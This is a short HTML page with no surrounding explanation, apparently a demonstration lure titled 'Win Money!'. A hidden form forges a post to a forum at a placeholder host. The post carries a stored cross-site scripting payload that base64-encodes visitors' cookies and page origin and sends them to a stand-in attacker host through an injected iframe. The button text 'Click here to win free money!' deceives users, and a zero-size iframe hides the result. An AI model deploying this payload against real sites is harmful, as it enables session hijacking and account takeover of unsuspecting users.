<!doctype html>
<html>
<head>
<title>Win Money!</title>
</head>
<body>
<form action="http://vulnerable-forum.com:8080/topic" method="post" target="test">
	<input type="hidden" name="title" value="Cute Cat !!">
	<input type="hidden" name="content" value="<img src='http://evil-attacker.com:8081/cute-cat.jpg'/><script>var url = btoa(window.location.origin);var cookies = btoa(document.cookie);var iframe = document.createElement('iframe');iframe.setAttribute('src', 'http://evil-attacker.com:8081/steal-cookies?url='+url+'&cookies='+cookies);document.getElementsByTagName('body')[0].appendChild(iframe);</script>">
	<input type="submit" value="Click here to win free money!"/>
</form>

<iframe name="test" width="0" height="0"></iframe>
</body>
</html>